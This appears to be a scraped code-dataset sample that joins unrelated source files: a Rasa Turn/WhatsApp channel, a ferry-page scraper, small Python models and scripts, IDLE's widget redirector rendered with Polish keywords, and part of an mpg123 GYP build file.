                ('object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='arguments.Argument')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| StarcoderdataPython |
5153151 | <gh_stars>1-10
import base64
import hmac
import json
import logging
import os
from asyncio import wait
from datetime import datetime, timedelta
from typing import Any, Awaitable, Callable, Dict, List, Optional, Text
from urllib.parse import urljoin
import asyncpg
import httpx
import sentry_sdk
from async_lru import alru_cache
from rasa.cli import utils as cli_utils
from rasa.core.channels import InputChannel, OutputChannel, UserMessage
from rasa.core.events import UserUttered
from sanic import Blueprint, response
from sanic.request import Request
from sanic.response import HTTPResponse
from sentry_sdk.integrations.logging import LoggingIntegration
from sentry_sdk.integrations.sanic import SanicIntegration
logger = logging.getLogger(__name__)
turn_client = httpx.Client()
SENTRY_DSN = os.environ.get("SENTRY_DSN", None)
if SENTRY_DSN:
sentry_sdk.init(
dsn=SENTRY_DSN, integrations=[LoggingIntegration(), SanicIntegration()]
)
@alru_cache(maxsize=None)
async def get_media_id(turn_url: Text, turn_token: Text, url: Text, http_retries: int):
    """Download the media at *url* and re-upload it to Turn's v1/media
    endpoint, returning Turn's media id.

    Results are memoised per (turn_url, turn_token, url, http_retries);
    NOTE(review): the cache is unbounded (maxsize=None), so distinct URLs
    accumulate for the process lifetime.
    """
    # TODO: Respect the caching headers from the URL, rather than indefinitely caching
    # Retry the whole download+upload up to http_retries times; only the
    # last failure is re-raised.
    for i in range(http_retries):
        try:
            async with turn_client.stream("GET", url) as media_response:
                media_response.raise_for_status()
                # Stream the source body straight into the upload request,
                # forwarding the original Content-Type.
                turn_response = await turn_client.post(
                    urljoin(turn_url, "v1/media"),
                    headers={
                        "Authorization": f"Bearer {turn_token}",
                        "Content-Type": media_response.headers["Content-Type"],
                    },
                    data=media_response.aiter_bytes(),
                )
                turn_response.raise_for_status()
                response_data: Any = turn_response.json()
                return response_data["media"][0]["id"]
        except httpx.HTTPError as e:
            if i == http_retries - 1:
                raise e
class TurnOutput(OutputChannel):
    """
    Turn output channel: sends Rasa bot responses to the Turn (WhatsApp)
    v1/messages API, optionally extending/releasing a conversation claim.
    """
    @classmethod
    def name(cls) -> Text:
        return "turn"
    def __init__(
        self,
        url: Text,
        token: Text,
        http_retries: int = 3,
        conversation_claim: Optional[Text] = None,
        inbound_message_id: Optional[Text] = None,
    ):
        # url/token: Turn API base URL and bearer token.
        # conversation_claim / inbound_message_id: set when replying to a
        # claimed inbound message (see _send_message's claim handling).
        self.url = url
        self.token = token
        self.conversation_claim = conversation_claim
        self.http_retries = http_retries
        self.inbound_message_id = inbound_message_id
        super().__init__()
    async def _send_message(
        self, body: Optional[dict], claim: Optional[Text] = "extend", **kwargs
    ) -> None:
        """POST *body* to Turn with retry and claim headers.

        claim="extend" keeps the conversation claim; "release"/"revert"
        give it up, and "revert" (with an inbound message id) hits the
        per-message automation endpoint with an empty body instead.
        """
        headers = {"Authorization": f"Bearer {self.token}"}
        if self.conversation_claim:
            if claim == "extend":
                headers["X-Turn-Claim-Extend"] = self.conversation_claim
            elif claim == "release" or claim == "revert":
                headers["X-Turn-Claim-Release"] = self.conversation_claim
        urlpath = "v1/messages"
        if self.conversation_claim and self.inbound_message_id and claim == "revert":
            urlpath = f"v1/messages/{self.inbound_message_id}/automation"
            headers["Accept"] = "application/vnd.v1+json"
            body = None
        for i in range(self.http_retries):
            if not body:
                # Empty-body POSTs need an explicit zero Content-Length.
                headers["Content-Length"] = "0"
            try:
                result = await turn_client.post(
                    urljoin(self.url, urlpath), headers=headers, json=body,
                )
                result.raise_for_status()
                return
            except httpx.HTTPError as e:
                # Only the final attempt's failure propagates.
                if i == self.http_retries - 1:
                    raise e
    async def send_response(self, recipient_id: Text, message: Dict[Text, Any]) -> None:
        """Dispatch a Rasa response dict to the right WhatsApp message type."""
        # The Rasa implementation for this sends the text and the media part of the
        # message separately. For WhatsApp, we want to send this as a media message
        # with a text caption, so we handle it differently here
        if message.get("image"):
            await self.send_image_url(recipient_id, message.pop("image"), **message)
        elif message.get("document"):
            await self.send_document_url(
                recipient_id, message.pop("document"), **message
            )
        elif message.get("custom"):
            await self.send_custom_json(recipient_id, message.pop("custom"), **message)
        elif message.get("buttons"):
            await self.send_text_with_buttons(
                recipient_id, message.pop("text"), message.pop("buttons"), **message
            )
        elif message.get("text"):
            await self.send_text_message(recipient_id, message.pop("text"), **message)
        else:
            raise NotImplementedError()
    async def send_text_message(
        self, recipient_id: Text, text: Text, **kwargs: Any
    ) -> None:
        """Send a plain WhatsApp text message."""
        await self._send_message(
            {"to": recipient_id, "type": "text", "text": {"body": text}}, **kwargs
        )
    async def send_image_url(
        self, recipient_id: Text, image: Text, text: Text = "", **kwargs: Any
    ) -> None:
        """Upload the image at *image* to Turn and send it, with *text* as caption."""
        media_id = await get_media_id(self.url, self.token, image, self.http_retries)
        image_obj = {"id": media_id}
        if text:
            image_obj["caption"] = text
        await self._send_message(
            {"to": recipient_id, "type": "image", "image": image_obj}, **kwargs
        )
    async def send_document_url(
        self, recipient_id: Text, document: Text, text: Text = "", **kwargs: Any
    ) -> None:
        """Upload the document at *document* to Turn and send it, with optional caption."""
        media_id = await get_media_id(self.url, self.token, document, self.http_retries)
        document_obj = {"id": media_id}
        if text:
            document_obj["caption"] = text
        await self._send_message(
            {"to": recipient_id, "type": "document", "document": document_obj}, **kwargs
        )
    async def send_text_with_buttons(
        self,
        recipient_id: Text,
        text: Text,
        buttons: List[Dict[Text, Any]],
        **kwargs: Any,
    ) -> None:
        # WhatsApp has no native button support here: buttons are rendered
        # as numbered lines appended to the message text.
        for idx, button in enumerate(buttons):
            text += "\n"
            text += cli_utils.button_to_string(button, idx)
        await self.send_text_message(recipient_id, text, **kwargs)
    async def send_custom_json(
        self, recipient_id: Text, json_message: Dict[Text, Any], **kwargs: Any
    ) -> None:
        """Send a raw Turn message payload; only the "to" field is filled in."""
        json_message["to"] = recipient_id
        await self._send_message(json_message, **kwargs)
    # TODO: elements message type
    # TODO: attachment message type
class TurnInput(InputChannel):
"""
Turn input channel
"""
@classmethod
def name(cls) -> Text:
return "turn"
@classmethod
def from_credentials(cls, credentials: Dict[Text, Any]) -> InputChannel:
if not credentials:
cls.raise_missing_credentials_exception()
return cls(
credentials.get("hmac_secret"),
credentials["url"],
credentials["token"],
credentials.get("postgresql_url"),
credentials.get("http_retries", 3),
)
def __init__(
self,
hmac_secret: Optional[Text],
url: Text,
token: Text,
postgresql_url: Optional[Text],
http_retries: int,
) -> None:
self.hmac_secret = hmac_secret
self.url = url
self.token = token
self.postgresql_url = postgresql_url
self._postgresql_pool = None
self.http_retries = http_retries
async def get_postgresql_pool(self) -> Optional[asyncpg.pool.Pool]:
if self._postgresql_pool is None and self.postgresql_url is not None:
self._postgresql_pool = await asyncpg.create_pool(self.postgresql_url)
return self._postgresql_pool
async def message_processed(
self, sender_id: Optional[Text], message_id: Optional[Text]
) -> bool:
"""
Have we processed a message with this ID before
"""
if not sender_id or not message_id:
return False
pool = await self.get_postgresql_pool()
if pool is None:
# If we don't have a postgresql config, don't deduplicate
return False
async with pool.acquire() as connection:
async with connection.transaction():
result = await connection.fetchval(
"""
SELECT 1
FROM events
WHERE
sender_id = $1 AND
type_name = $2 AND
data::json ->> 'message_id' = $3 AND
timestamp > $4
LIMIT 1
""",
sender_id,
UserUttered.type_name,
message_id,
(datetime.utcnow() - timedelta(days=1)).timestamp(),
)
return result == 1
def blueprint(
self, on_new_message: Callable[[UserMessage], Awaitable[Any]]
) -> Blueprint:
turn_webhook = Blueprint("turn_webhook", __name__)
@turn_webhook.route("/", methods=["GET"])
async def health(request: Request) -> HTTPResponse:
return response.json({"status": "ok"})
@turn_webhook.route("/webhook", methods=["POST"])
async def webhook(request: Request) -> HTTPResponse:
if self.hmac_secret:
signature = request.headers.get("X-Turn-Hook-Signature") or ""
valid_signature = self.validate_signature(
self.hmac_secret, request.body, signature
)
if not valid_signature:
return response.json(
{"success": False, "error": "invalid_signature"}, status=401
)
else:
logging.warning("hmac_secret config not set, not validating signature")
try:
messages = request.json.get("messages", [])
assert isinstance(messages, list)
except (TypeError, AttributeError, AssertionError):
return response.json(
{"success": False, "error": "invalid_body"}, status=400
)
conversation_claim = request.headers.get("X-Turn-Claim", None)
user_messages = []
for message in messages:
try:
message["conversation_claim"] = conversation_claim
processed = await self.message_processed(
message.get("from"), message.get("id")
)
if not processed:
user_messages.append(self.extract_message(message))
except (TypeError, KeyError, AttributeError):
logger.warning(f"Invalid message: {json.dumps(message)}")
return response.json(
{"success": False, "error": "invalid_message"}, status=400
)
if user_messages:
# wait doesn't like empty lists
await wait(list(map(on_new_message, user_messages)))
return response.json({"success": True})
return turn_webhook
@staticmethod
def validate_signature(secret: Text, payload: bytes, signature: Text) -> bool:
decoded_secret = secret.encode("utf8")
decoded_signature = base64.b64decode(signature)
digest = hmac.new(decoded_secret, payload, "sha256").digest()
return hmac.compare_digest(digest, decoded_signature)
def extract_message(self, message: dict) -> UserMessage:
message_type = message["type"]
handler = getattr(self, f"handle_{message_type}")
return handler(message)
def handle_common(self, text: Text, message: dict) -> UserMessage:
return UserMessage(
text=text,
output_channel=self.get_output_channel(
message.pop("conversation_claim", None), message.get("id")
),
sender_id=message.pop("from"),
input_channel=self.name(),
message_id=message.pop("id"),
metadata=message,
)
def handle_text(self, message: dict) -> UserMessage:
return self.handle_common(message.pop("text")["body"], message)
def handle_media(self, media_type: str, message: dict) -> UserMessage:
return self.handle_common(message[media_type].pop("caption", ""), message)
def handle_audio(self, message: dict) -> UserMessage:
return self.handle_media("audio", message)
def handle_document(self, message: dict) -> UserMessage:
return self.handle_media("document", message)
def handle_image(self, message: dict) -> UserMessage:
return self.handle_media("image", message)
def handle_video(self, message: dict) -> UserMessage:
return self.handle_media("video", message)
def handle_voice(self, message: dict) -> UserMessage:
return self.handle_media("voice", message)
def handle_contacts(self, message: dict) -> UserMessage:
return self.handle_common("", message)
def handle_location(self, message: dict) -> UserMessage:
return self.handle_common("", message)
    def get_output_channel(
        self,
        conversation_claim: Optional[Text] = None,
        inbound_message_id: Optional[Text] = None,
    ) -> OutputChannel:
        """Create a TurnOutput bound to this channel's URL/token settings.

        ``conversation_claim`` and ``inbound_message_id`` come from the
        inbound payload and let the output channel reply in-context.
        """
        return TurnOutput(
            self.url,
            self.token,
            self.http_retries,
            conversation_claim,
            inbound_message_id,
        )
| StarcoderdataPython |
3249906 | #!/usr/bin/python3
import threading
from datetime import datetime
import urllib.request
BASE_PATH = '/Users/sukumargv/bc_ferries/'
def get_page(page_url, local_fname):
    """Download *page_url* into BASE_PATH under a timestamped file name.

    *local_fname* is a strftime pattern (e.g. "s-%Y-%m-%d_%H-%M-%S.html");
    it is expanded with the current local time before the download starts.
    """
    # BUG FIX: strftime used to be applied to the whole joined path, which
    # would mangle any "%" in the directory part, and "{}/{}" produced a
    # double slash because BASE_PATH already ends with "/". Expand only the
    # file-name pattern and append it to BASE_PATH directly.
    fname = BASE_PATH + datetime.now().strftime(local_fname)
    urllib.request.urlretrieve(page_url, fname)
"""
http://orca.bcferries.com:8080/cc/settings/includes/maps/route0.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route1.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route2.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route3.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route4.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route5.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route6.html
http://orca.bcferries.com:8080/cc/settings/includes/maps/route7.html
http://bcferries.applocation.net/routemaps/route13.html
http://bcferries.applocation.net/routemaps/route16.html
http://bcferries.applocation.net/routemaps/route17.html
http://bcferries.applocation.net/routemaps/route18.html
http://bcferries.applocation.net/routemaps/route19.html
http://bcferries.applocation.net/routemaps/route20.html
http://bcferries.applocation.net/routemaps/route21.html
http://bcferries.applocation.net/routemaps/route22.html
http://bcferries.applocation.net/routemaps/route23.html
http://bcferries.applocation.net/routemaps/route24.html
http://bcferries.applocation.net/routemaps/route25.html
http://bcferries.applocation.net/routemaps/route29.html
"""
def get_all():
    """Kick off one download thread per route map plus the two status pages."""
    route_url = "http://bcferries.applocation.net/routemaps/route{}.html"
    route_ids = [0, 1, 2, 3, 4, 5, 6, 7, 13, 16, 17, 18, 19,
                 20, 21, 22, 23, 24, 25, 29]
    for route_id in route_ids:
        worker = threading.Thread(
            target=get_page,
            args=(route_url.format(route_id),
                  "r{:02d}-%Y-%m-%d_%H-%M-%S.html".format(route_id)),
        )
        worker.start()
    # Departure and at-a-glance status pages, fetched the same way.
    threading.Thread(
        target=get_page,
        args=("http://orca.bcferries.com:8080/cc/marqui/actualDepartures.asp",
              "s-%Y-%m-%d_%H-%M-%S.html"),
    ).start()
    threading.Thread(
        target=get_page,
        args=("http://orca.bcferries.com:8080/cc/marqui/at-a-glance.asp",
              "i-%Y-%m-%d_%H-%M-%S.html"),
    ).start()
if __name__ == '__main__':
    # Entry point: download every tracked page once per invocation.
    get_all()
| StarcoderdataPython |
6529521 | <filename>fastapi_events/typing.py
from enum import Enum
from typing import Any, Tuple, Union
Event = Tuple[Union[str, Enum], Any]
| StarcoderdataPython |
1814830 | from datetime import datetime
from app.extensions import db
class Product(db.Model):
    """A product grouping objectives and indicators under a product group."""

    id = db.Column(db.Integer(), primary_key=True)
    # Human-readable name; unique and indexed for lookups.
    name = db.Column(db.String(120), unique=True, nullable=False, index=True)
    # Optional contact address for the product.
    email = db.Column(db.String(120), nullable=True)
    # URL-safe identifier; unique and indexed for routing.
    slug = db.Column(db.String(120), unique=True, nullable=False, index=True)
    product_group_id = db.Column(db.Integer(), db.ForeignKey('product_group.id'), nullable=False, index=True)
    # Child collections; passive_deletes leaves row removal to the database.
    objectives = db.relationship(
        'Objective', backref=db.backref('product', lazy='joined'), lazy='dynamic', passive_deletes=True)
    indicators = db.relationship(
        'Indicator', backref=db.backref('product', lazy='joined'), lazy='dynamic', passive_deletes=True)
    # Audit fields: who touched the record and when.
    username = db.Column(db.String(120), default='')
    created = db.Column(db.DateTime(), default=datetime.utcnow)
    updated = db.Column(db.DateTime(), onupdate=datetime.utcnow, default=datetime.utcnow)

    def get_owner(self):
        # NOTE(review): relies on a `product_group` relationship presumably
        # defined as a backref on the ProductGroup model — confirm it
        # exposes `.name`.
        return self.product_group.name

    def __repr__(self):
        return '<Product {}>'.format(self.name)
| StarcoderdataPython |
3244828 | <filename>data/HQdata.py<gh_stars>0
import datetime
class Tournament:
    """A tournament played on a given date and game patch, holding matches."""

    def __init__(self, patch, name):
        self.date = datetime.date.today()
        self.patch = patch
        self.name = name
        # BUG FIX: `matches` used to be a class-level list, so every
        # Tournament instance shared (and kept accumulating) the same
        # matches. Each instance now owns its own list.
        self.matches = []

    def addMatch(self, match):
        """Append *match* (a Match) to this tournament."""
        self.matches.append(match)

    def print(self, output):
        """Write one CSV line per recorded round to *output* (writable file)."""
        prefix = str(self.name) + "," + str(self.date) + "," + str(self.patch)
        for match in self.matches:
            match.print(prefix, output)
class Match:
    """A single match at a given bracket level, holding its rounds."""

    def __init__(self, level):
        self.level = level
        # BUG FIX: `rounds` used to be a class-level list shared by every
        # Match instance; it is now per-instance.
        self.rounds = []

    def addRound(self, round):
        """Append *round* (a Round) to this match."""
        self.rounds.append(round)

    def print(self, string, output):
        """Write one CSV line per round, prefixed by *string* and this level."""
        prefix = string + "," + str(self.level)
        for round in self.rounds:
            round.print(prefix, output)
class Round:
    """One round of a match: two players, their characters and flag scores."""

    # Class-level defaults, kept for compatibility with existing callers.
    playerL = "default 1"
    playerR = "default 2"
    scoreL = -1
    scoreR = -1
    characters = ["Isabella", "Marie", "<NAME>", "Kalkstein",
                  "Lazlo", "Gedeon", "Barabash", "Jacek"]
    characterL = characters[0]
    characterR = characters[0]
    doubles = 0

    def __init__(self, playerL, playerR, scoreL, scoreR, characterL, characterR, doubles):
        self.playerL = playerL
        self.playerR = playerR
        self.scoreL = scoreL
        self.scoreR = scoreR
        self.characterL = characterL
        self.characterR = characterR
        self.doubles = doubles

    def print(self, string, output):
        """Append this round's fields to *string* and write the CSV line."""
        fields = (self.playerL, self.characterL, self.scoreL,
                  self.scoreR, self.characterR, self.playerR, self.doubles)
        line = string + "".join("," + str(field) for field in fields) + "\n"
        output.write(line)
# --- Interactive entry of one tournament's results into HQdata.csv ----------
# NOTE(review): the file handle is opened in append mode and never closed
# explicitly; data is only guaranteed flushed at interpreter exit.
output= open("HQdata.csv",'a')
characters= ["Isabella","Marie","<NAME>","Kalkstein","Lazlo","Gedeon","Barabash","Jacek"]
name= input("Enter the name of the tournament:\n")
patch= input("Enter the current patch number of the game:\n")
tournament= Tournament(patch,name)
unwonT= True   # True while the tournament is still being entered
while unwonT:
    level= input("Enter the level of the next match. Finals are level 0, each round earlier is one higher. Round robins are all level 3:\n")
    match= Match(level)
    tournament.addMatch(match)
    unwonM= True   # True while the current match is still being entered
    while unwonM:
        playerL= input("Enter the name of the player on the left:\n")
        playerR= input("Enter the name of the player on the right:\n")
        scoreL= input("Enter the number of flags earned by "+playerL+":\n")
        scoreR= input("Enter the number of flags earned by "+playerR+":\n")
        characterL=characters[int(input("For "+playerL+" enter 0 for izzy, 1 for marie, 2 for zera, 3 for kalk, 4 for lazlo, 5 for gedeon, 6 for barabash, 7 for jacek:\n"))]
        characterR=characters[int(input("For "+playerR+" enter 0 for izzy, 1 for marie, 2 for zera, 3 for kalk, 4 for lazlo, 5 for gedeon, 6 for barabash, 7 for jacek:\n"))]
        doubles= input("Enter the number of double hits during the match:\n")
        # NOTE(review): `round` shadows the builtin of the same name.
        round= Round(playerL,playerR,scoreL,scoreR,characterL,characterR,doubles)
        match.addRound(round)
        # Prompt until the answer is exactly "Y" or "n".
        won=0
        while won!="Y" and won!="n":
            won= input("Is the match over? Y/n:\n")
        if won=="Y":
            unwonM=False
    won=0
    while won!="Y" and won!="n":
        won= input("Is the tournament over? Y/n:\n")
    if won=="Y":
        unwonT=False
# Write the accumulated tournament as CSV rows.
tournament.print(output);
| StarcoderdataPython |
6499218 | from typing import Any, Union, Optional
import yaml
from dataclasses import dataclass
from pathlib import Path
from .models.locale import Locale, LocaleConfig
from pyi18n_new.lib.base_class import BaseClass
@dataclass
class I18N(BaseClass):
    """Translation entry point: one attribute per locale folder under *path*."""

    path: Path
    default: str = "en"

    def __post_init__(self):
        # Every sub-directory of `path` becomes a Locale attribute named
        # after the directory (e.g. self.en, self.de).
        for folder in list(self.path.iterdir()):
            setattr(self, folder.name, self.get_locale(folder))

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes fall through to the default locale's sections.
        return self[self.default][name]

    @property
    def languages(self) -> list[str]:
        """Names of all loaded locales."""
        return [attr for attr, value in self.__dict__.items()
                if isinstance(value, Locale)]

    def get_locale(self, path: Path) -> Locale:
        """Build a Locale from a folder's ``__init__.yml`` configuration."""
        config_file = path / "__init__.yml"
        with config_file.open() as handle:
            settings = yaml.safe_load(handle.read())
        return Locale(LocaleConfig(lang=path.name, path=path, **settings))

    def translate(self, path: str, lang: Optional[str] = None, **kwargs) -> Union[str, list]:
        """python-i18n compatible interface: ``translate("section.name")``."""
        section, name = path.split(".")
        return self[lang or self.default][section][name](**kwargs)
| StarcoderdataPython |
6640487 | <reponame>sanglass/sandglass.time<gh_stars>1-10
from sandglass.time import _
from sandglass.time.api.error import APIError
# API error codes and messages.
# Keys are stable machine-readable codes; values are translatable messages.
CODES = {
    'INVALID_SIGNIN': _("Invalid sign in credentials"),
    'USER_EMAIL_EXISTS': _("A user with the same E-Mail already exists"),
    'USER_NOT_FOUND': _("User not found"),
}
class APIV1Error(APIError):
    """
    Exception class for API v1 errors.
    """
    # Error-code table for this exception type; how codes are resolved to
    # messages is defined by the APIError base class.
    codes = CODES
| StarcoderdataPython |
8077589 | z tkinter zaimportuj TclError
klasa WidgetRedirector:

    """Support for redirecting arbitrary widget subcommands.

    Some Tk operations don't normally pass through tkinter. For example, if
    a character is inserted into a Text widget by pressing a key, a default
    Tk binding to the widget's 'insert' operation is activated, and the Tk
    library processes the insert without calling back into tkinter.

    Although a binding to <Key> could be made via tkinter, what we really
    want is to hook the Tk 'insert' operation itself, so that a text.insert
    call in idle code has the same effect as a key press.

    When a widget is instantiated, a Tcl command is created whose name is
    the same as the pathname widget._w. This command is used to invoke the
    various widget operations, e.g. insert (for a Text widget). We hook this
    command and provide a facility ('register') to intercept the widget
    operation. We also intercept method calls on the tkinter class instance
    that represents the tk widget.

    In IDLE, WidgetRedirector is used by Percolator to intercept Text
    commands. The function being registered provides access to the top of a
    Percolator chain. At the bottom of the chain is a call to the original
    Tk widget operation.
    """

    def __init__(self, widget):
        '''Initialize attributes and set up redirection.

        _operations: dict mapping operation name to new function.
        widget: the widget whose tcl command is to be intercepted.
        tk: widget.tk, a convenience attribute, probably not needed.
        orig: new name of the original tcl command.

        Since renaming to orig fails with TclError when orig already exists,
        only one WidgetRedirector can exist for a given widget.
        '''
        self._operations = {}
        self.widget = widget            # widget instance
        self.tk = tk = widget.tk        # widget's root
        w = widget._w                   # widget's (full) Tk pathname
        self.orig = w + "_orig"
        # Rename the Tcl command within Tcl:
        tk.call("rename", w, self.orig)
        # Create a new Tcl command whose name is the widget's pathname, and
        # whose action is to dispatch on the operation passed to the widget:
        tk.createcommand(w, self.dispatch)

    def __repr__(self):
        zwróć "%s(%s<%s>)" % (self.__class__.__name__,
                              self.widget.__class__.__name__,
                              self.widget._w)

    def close(self):
        "Unregister operations and revert redirection created by .__init__."
        dla operation w list(self._operations):
            self.unregister(operation)
        widget = self.widget
        tk = widget.tk
        w = widget._w
        # Restore the original widget Tcl command.
        tk.deletecommand(w)
        tk.call("rename", self.orig, w)
        usuń self.widget, self.tk  # Should not be needed
        # if instance is deleted after close, as in Percolator.

    def register(self, operation, function):
        '''Return OriginalCommand(operation) after registering function.

        Registration adds an operation: function pair to ._operations. It
        also adds a widget function attribute that masks the tkinter class
        instance method. Method masking operates independently from command
        dispatch.

        If a second function is registered for the same operation, the
        first function is replaced in both places.
        '''
        self._operations[operation] = function
        setattr(self.widget, operation, function)
        zwróć OriginalCommand(self, operation)

    def unregister(self, operation):
        '''Return the function for the operation, or None.

        Deleting the instance attribute unmasks the class attribute.
        '''
        jeżeli operation w self._operations:
            function = self._operations[operation]
            usuń self._operations[operation]
            spróbuj:
                delattr(self.widget, operation)
            wyjąwszy AttributeError:
                dalej
            zwróć function
        inaczej:
            zwróć Nic

    def dispatch(self, operation, *args):
        '''Callback from Tcl which runs when the widget is referenced.

        If an operation has been registered in self._operations, apply the
        associated function to the args passed into Tcl. Otherwise, pass
        the operation through to Tk via the original Tcl function.

        Note that if a registered function is called, the operation is NOT
        passed through to Tk. Apply the function returned by
        self.register() to *args to accomplish that. For an example, see
        ColorDelegator.py.
        '''
        m = self._operations.get(operation)
        spróbuj:
            jeżeli m:
                zwróć m(*args)
            inaczej:
                zwróć self.tk.call((self.orig, operation) + args)
        wyjąwszy TclError:
            zwróć ""
klasa OriginalCommand:
    '''Callable for an original tk command that has been redirected.

    Returned by .register; can be used inside the registered function.

        redir = WidgetRedirector(text)
        def my_insert(*args):
            print("insert", args)
            original_insert(*args)
        original_insert = redir.register("insert", my_insert)
    '''

    def __init__(self, redir, operation):
        '''Create .tk_call and .orig_and_operation for the .__call__ method.

        .redir and .operation store the input args for __repr__.
        .tk and .orig copy attributes of .redir (probably not needed).
        '''
        self.redir = redir
        self.operation = operation
        self.tk = redir.tk  # redundant with self.redir
        self.orig = redir.orig  # redundant with self.redir
        # These two could be deleted after checking recipient code.
        self.tk_call = redir.tk.call
        self.orig_and_operation = (redir.orig, operation)

    def __repr__(self):
        zwróć "%s(%r, %r)" % (self.__class__.__name__,
                              self.redir, self.operation)

    def __call__(self, *args):
        zwróć self.tk_call(self.orig_and_operation + args)
def _widget_redirector(parent):  # htest #
    # Manual test: echo every Text 'insert' operation to stdout while still
    # performing the original insert.
    z tkinter zaimportuj Tk, Text
    zaimportuj re
    root = Tk()
    root.title("Test WidgetRedirector")
    width, height, x, y = list(map(int, re.split('[x+]', parent.geometry())))
    # Place the test window just below the parent window.
    root.geometry("+%d+%d"%(x, y + 150))
    text = Text(root)
    text.pack()
    text.focus_set()
    redir = WidgetRedirector(text)
    def my_insert(*args):
        print("insert", args)
        original_insert(*args)
    original_insert = redir.register("insert", my_insert)
    root.mainloop()
jeżeli __name__ == "__main__":
    # Run the unit tests first, then the interactive human test.
    zaimportuj unittest
    unittest.main('idlelib.idle_test.test_widgetredir',
                  verbosity=2, exit=Nieprawda)

    z idlelib.idle_test.htest zaimportuj run
    run(_widget_redirector)
| StarcoderdataPython |
12814253 | <gh_stars>1-10
# This file is used with the GYP meta build system.
# http://code.google.com/p/gyp
# To build try this:
# svn co http://gyp.googlecode.com/svn/trunk gyp
# ./gyp/gyp -f make --depth=. mpg123.gyp
# make
# ./out/Debug/test
{
'variables': {
'target_arch%': 'ia32',
},
'target_defaults': {
'default_configuration': 'Debug',
'configurations': {
'Debug': {
'defines': [ 'DEBUG', '_DEBUG' ],
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeLibrary': 1, # static debug
},
},
},
'Release': {
'defines': [ 'NDEBUG' ],
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeLibrary': 0, # static release
},
},
}
},
'msvs_settings': {
'VCLinkerTool': {
'GenerateDebugInformation': 'true',
},
},
'conditions': [
['OS=="mac"', {
'conditions': [
['target_arch=="ia32"', { 'xcode_settings': { 'ARCHS': [ 'i386' ] } }],
['target_arch=="x64"', { 'xcode_settings': { 'ARCHS': [ 'x86_64' ] } }]
],
}],
]
},
'targets': [
{
'target_name': 'mpg123',
'product_prefix': 'lib',
'type': 'static_library',
'variables': {
'conditions': [
# "mpg123_cpu" is the cpu optimization to use
# Windows uses "i386_fpu" even on x64 to avoid compiling .S asm files
# (I don't think the 64-bit ASM files are compatible with `ml`/`ml64`...)
['OS=="win"', { 'mpg123_cpu%': 'i386_fpu' },
{ 'conditions': [
['target_arch=="arm"', { 'mpg123_cpu%': 'arm_nofpu' }],
['target_arch=="ia32"', { 'mpg123_cpu%': 'i386_fpu' }],
['target_arch=="x64"', { 'mpg123_cpu%': 'x86-64' }],
]}],
]
},
'sources': [
'src/libmpg123/compat.c',
'src/libmpg123/parse.c',
'src/libmpg123/frame.c',
'src/libmpg123/format.c',
'src/libmpg123/dct64.c',
'src/libmpg123/equalizer.c',
'src/libmpg123/id3.c',
'src/libmpg123/optimize.c',
'src/libmpg123/readers.c',
'src/libmpg123/tabinit.c',
'src/libmpg123/libmpg123.c',
'src/libmpg123/index.c',
'src/libmpg123/stringbuf.c',
'src/libmpg123/icy.c',
'src/libmpg123/icy2utf8.c',
'src/libmpg123/ntom.c',
'src/libmpg123/synth.c',
'src/libmpg123/synth_8bit.c',
'src/libmpg123/layer1.c',
'src/libmpg123/layer2.c',
'src/libmpg123/layer3.c',
'src/libmpg123/feature.c',
],
'include_dirs': [
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
],
'defines': [
'PIC',
'NOXFERMEM',
'HAVE_CONFIG_H',
],
'direct_dependent_settings': {
'include_dirs': [
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
]
},
'conditions': [
['mpg123_cpu=="arm_nofpu"', {
'defines': [
'OPT_ARM',
'REAL_IS_FIXED',
'NEWOLD_WRITE_SAMPLE',
],
'sources': [
'src/libmpg123/synth_arm.S',
],
}],
['mpg123_cpu=="i386_fpu"', {
'defines': [
'OPT_I386',
'REAL_IS_FLOAT',
'NEWOLD_WRITE_SAMPLE',
],
'sources': [
'src/libmpg123/synth_s32.c',
'src/libmpg123/synth_real.c',
'src/libmpg123/dct64_i386.c',
],
}],
['mpg123_cpu=="x86-64"', {
'defines': [
'OPT_X86_64',
'REAL_IS_FLOAT',
],
'sources': [
'src/libmpg123/dct64_x86_64.S',
'src/libmpg123/dct64_x86_64_float.S',
'src/libmpg123/synth_s32.c',
'src/libmpg123/synth_real.c',
'src/libmpg123/synth_stereo_x86_64.S',
'src/libmpg123/synth_stereo_x86_64_float.S',
'src/libmpg123/synth_stereo_x86_64_s32.S',
'src/libmpg123/synth_x86_64.S',
'src/libmpg123/synth_x86_64_s32.S',
'src/libmpg123/synth_x86_64_float.S',
],
}],
],
},
{
'target_name': 'output',
'product_prefix': 'lib',
'type': 'static_library',
'variables': {
'conditions': [
# "mpg123_backend" is the audio backend to use
['OS=="mac"', { 'mpg123_backend%': 'coreaudio' }],
['OS=="win"', { 'mpg123_backend%': 'win32' }],
['OS=="linux"', { 'mpg123_backend%': 'alsa' }],
['OS=="freebsd"', { 'mpg123_backend%': 'alsa' }],
['OS=="solaris"', { 'mpg123_backend%': 'sun' }],
]
},
'include_dirs': [
'src',
'src/output',
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
],
'defines': [
'PIC',
'NOXFERMEM',
'REAL_IS_FLOAT',
'HAVE_CONFIG_H',
'BUILDING_OUTPUT_MODULES=1'
],
'direct_dependent_settings': {
'include_dirs': [
'src',
'src/output',
'src/libmpg123',
# platform and arch-specific headers
'config/<(OS)/<(target_arch)',
]
},
'conditions': [
['mpg123_backend=="alsa"', {
'link_settings': {
'libraries': [
'-lasound',
]
}
}],
['mpg123_backend=="coreaudio"', {
'link_settings': {
'libraries': [
'-framework AudioToolbox',
'-framework AudioUnit',
'-framework CoreServices',
],
},
}],
['mpg123_backend=="openal"', {
'defines': [
'OPENAL_SUBDIR_OPENAL'
],
'link_settings': {
'libraries': [
